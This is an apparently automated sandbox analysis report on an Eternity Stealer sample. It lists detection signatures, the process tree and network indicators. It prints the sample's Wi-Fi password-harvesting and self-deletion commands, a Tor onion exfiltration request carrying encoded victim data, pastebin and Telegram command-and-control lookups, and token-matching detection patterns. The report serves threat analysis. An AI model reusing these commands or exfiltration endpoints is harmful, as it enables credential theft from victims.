Windows Analysis Report
Stealer.exe

Overview

General Information

Sample name: Stealer.exe
Analysis ID: 1417452
MD5: 495f88115eabed181e30727f2d2363d3
SHA1: 59cd87a7e30926fc7c51a921b78216119f9d4f1c
SHA256: cfef836fa4515f5371b8a30300098bdb03d4c91b123f0a35252757bc73b388f2

Detection

Eternity Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Sigma detected: Capture Wi-Fi password
Yara detected Eternity Stealer
Connects to a pastebin service (likely for C&C)
Contains functionality to capture screen (.Net source)
Deletes itself after installation
Found Tor onion address
Installs new ROOT certificates
Machine Learning detection for sample
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Self deletion via cmd or bat file
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Uses netsh to modify the Windows network and firewall settings
Uses ping.exe to check the status of other devices and networks
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Stores large binary data to the registry
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • Stealer.exe (PID: 2308 cmdline: "C:\Users\user\Desktop\Stealer.exe" MD5: 495F88115EABED181E30727F2D2363D3)
    • cmd.exe (PID: 2436 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • chcp.com (PID: 628 cmdline: chcp 65001 MD5: 0C8C209151A45A4D7774E89C2F4079AA)
      • netsh.exe (PID: 2300 cmdline: netsh wlan show profile MD5: 637982A421D0133DCEAA0D1490D1DC9C)
      • findstr.exe (PID: 2496 cmdline: findstr All MD5: 6A2E9BBD516D064C925A9634A5632854)
    • cmd.exe (PID: 1948 cmdline: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\user\Desktop\Stealer.exe" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • chcp.com (PID: 1912 cmdline: chcp 65001 MD5: 0C8C209151A45A4D7774E89C2F4079AA)
      • PING.EXE (PID: 2636 cmdline: ping 127.0.0.1 MD5: 5FB30FE90736C7FC77DE637021B1CE7C)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Source: Stealer.exe | Rule: JoeSecurity_EternityStealer | Description: Yara detected Eternity Stealer | Author: Joe Security
Source: Stealer.exe | Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security
Source: Stealer.exe | Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Description: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen | Strings:
  • 0x4a07e:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x4a0f0:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x4a17a:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x4a20c:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x4a276:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x4a2e8:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x4a37e:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x4a40e:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

Source | Rule | Description | Author | Strings
Source: 00000000.00000000.333992859.0000000000AD2000.00000020.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_EternityStealer | Description: Yara detected Eternity Stealer | Author: Joe Security
Source: 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp | Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex | Description: Detects executables referencing Discord tokens regular expressions | Author: ditekSHen | Strings:
  • 0x5f8cc:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}
Source: Process Memory Space: Stealer.exe PID: 2308 | Rule: JoeSecurity_EternityStealer | Description: Yara detected Eternity Stealer | Author: Joe Security
Source: Process Memory Space: Stealer.exe PID: 2308 | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: Process Memory Space: Stealer.exe PID: 2308 | Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex | Description: Detects executables referencing Discord tokens regular expressions | Author: ditekSHen | Strings:
  • 0x931c3:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}

Source | Rule | Description | Author | Strings
Source: 0.0.Stealer.exe.ad0000.0.unpack | Rule: JoeSecurity_EternityStealer | Description: Yara detected Eternity Stealer | Author: Joe Security
Source: 0.0.Stealer.exe.ad0000.0.unpack | Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security
Source: 0.0.Stealer.exe.ad0000.0.unpack | Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Description: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen | Strings:
  • 0x4a07e:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x4a0f0:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x4a17a:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x4a20c:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x4a276:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x4a2e8:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x4a37e:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x4a40e:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

System Summary

Source: DNS query | Author: Brandon George (blog post), Thomas Patzke | Data: Image: C:\Users\user\Desktop\Stealer.exe, QueryName: ip-api.com

Stealing of Sensitive Information

Source: Process started | Author: Joe Security | Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Stealer.exe", ParentImage: C:\Users\user\Desktop\Stealer.exe, ParentProcessId: 2308, ParentProcessName: Stealer.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 2436, ProcessName: cmd.exe
No Snort rule has matched

AV Detection

Source: Stealer.exe | Avira: detected
Source: http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/4c9395d28d054ddebee26b2aa | Avira URL Cloud: Label: malware
Source: Stealer.exe | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.22:49164 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.34.170:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: Stealer.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: unknown | DNS query: name: pastebin.com
Source: Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: khttp://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/4c9395d28d054ddebee26b2aa2a2c910
Source: Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/4c9395d28d054ddebee26b2aa2a2c910?u=QWxidXM%3D&p=NzAxMTg4&i=MTAyLjE2NS40OC40Mw%3D%3D&co=VW5pdGVkIFN0YXRlcyAoVVMp&ci=V2FzaGluZ3Rvbg%3D%3D&t=MzI3
Source: Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/4c9395d28d054ddebee26b2aa2a2c910?u=QWxidXM=&p=NzAxMTg4&i=MTAyLjE2NS40OC40Mw==&co=VW5pdGVkIFN0YXRlcyAoVVMp&ci=V2FzaGluZ3Rvbg==&t=MzI3
Source: Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: khttp://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/4c9395d28d054ddebee26b2aa2a2c910
Source: unknown | Network traffic detected: HTTP traffic on port 49166 -> 9200
Source: unknown | Network traffic detected: HTTP traffic on port 9200 -> 49166
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1
Source: Yara match | File source: Stealer.exe, type: SAMPLE
Source: Yara match | File source: 0.0.Stealer.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 188.166.166.142:9200
Source: global traffic | HTTP traffic detected: GET /tor_proxies HTTP/1.1; Host: t.me; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/X2Ddjiv0 HTTP/1.1; Host: pastebin.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /json HTTP/1.1; Host: ip-api.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /stld/4c9395d28d054ddebee26b2aa2a2c910?u=QWxidXM%3D&p=NzAxMTg4&i=MTAyLjE2NS40OC40Mw%3D%3D&co=VW5pdGVkIFN0YXRlcyAoVVMp&ci=V2FzaGluZ3Rvbg%3D%3D&t=MzI3 HTTP/1.1; Host: izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion; Content-Length: 110240; Expect: 100-continue; Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | IP Address: 172.67.34.170
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Users\user\Desktop\Stealer.exe | DNS query: name: ip-api.com
Source: unknown | TCP traffic detected without corresponding DNS query: 188.166.166.142
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown | DNS traffic detected: queries for: ip-api.com
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Stealer.exe, 00000000.00000002.466624556.000000001A554000.00000004.00000020.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466707746.000000001BF1B000.00000004.00000020.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF43000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
Source: Stealer.exe, 00000000.00000002.466624556.000000001A554000.00000004.00000020.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/json
Source: Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/4c9395d28d054ddebee26b2aa
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF1B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: Stealer.exe, 00000000.00000002.466624556.000000001A554000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com
Source: Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.comp
Source: Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Stealer.exe, 00000000.00000002.466413641.00000000023AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://t.me
Source: Stealer.exe, 00000000.00000002.466413641.00000000023AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://t.mep
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn5.cdn-telegram.org/file/urI_EKpgc2j3bnVEG7hJPiftbxwqp29Csge9PUwai_V9SyHDH8vYkc30DN237hWwA
Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Stealer.exe | String found in binary or memory: https://github.com/L1ghtM4n/TorProxy/blob/main/LIB/Tor.zip?raw=true
Source: Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com
Source: Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/
Source: Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/X2Ddjiv0
Source: Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/X2Ddjiv0p
Source: Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/cription
Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Stealer.exe, 00000000.00000002.466624556.000000001A554000.00000004.00000020.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466707746.000000001BF1B000.00000004.00000020.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
Source: Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me
Source: Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/tor_proxies
Source: Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/tor_proxiesp
Source: Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://web.telegram.org
Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/favicon.ico
Source: unknown | Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49164

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Stealer.exe, qq16.cs | .Net Code: MakeScreenshot

System Summary

Source: Stealer.exe, type: SAMPLE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.0.Stealer.exe.ad0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables referencing Discord tokens regular expressions | Author: ditekSHen
Source: Process Memory Space: Stealer.exe PID: 2308, type: MEMORYSTR | Matched rule: Detects executables referencing Discord tokens regular expressions | Author: ditekSHen
Source: Stealer.exe, 00000000.00000000.334000781.0000000000B26000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameDeath13.exe: vs Stealer.exe
Source: Stealer.exe, 00000000.00000002.466352660.000000000035D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Stealer.exe
Source: Stealer.exe | Binary or memory string: OriginalFilenameDeath13.exe: vs Stealer.exe
Source: C:\Users\user\Desktop\Stealer.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Stealer.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Stealer.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Stealer.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Stealer.exe | Section loaded: bcrypt.dll
Source: C:\Users\user\Desktop\Stealer.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Stealer.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\Stealer.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\Stealer.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\Stealer.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Stealer.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\Stealer.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Stealer.exe | Section loaded: credssp.dll
Source: C:\Users\user\Desktop\Stealer.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Stealer.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Stealer.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\Stealer.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\Stealer.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Stealer.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Stealer.exe | Section loaded: rpcrtremote.dll
Source: C:\Users\user\Desktop\Stealer.exe | Section loaded: wbemcomn2.dll
Source: C:\Users\user\Desktop\Stealer.exe | Section loaded: ntdsapi.dll
Source: C:\Users\user\Desktop\Stealer.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Stealer.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\Stealer.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Stealer.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Stealer.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Stealer.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: winbrand.dll
Source: C:\Windows\System32\chcp.com | Section loaded: ulib.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: credui.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: odbc32.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpqec.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: qutil.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: ws2help.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: nshhttp.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: nci.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: devrtl.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: napmontr.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: certcli.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: logoncli.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: ndfapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wdi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: tdh.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wlanutil.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: p2pcollab.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: wlanhlp.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
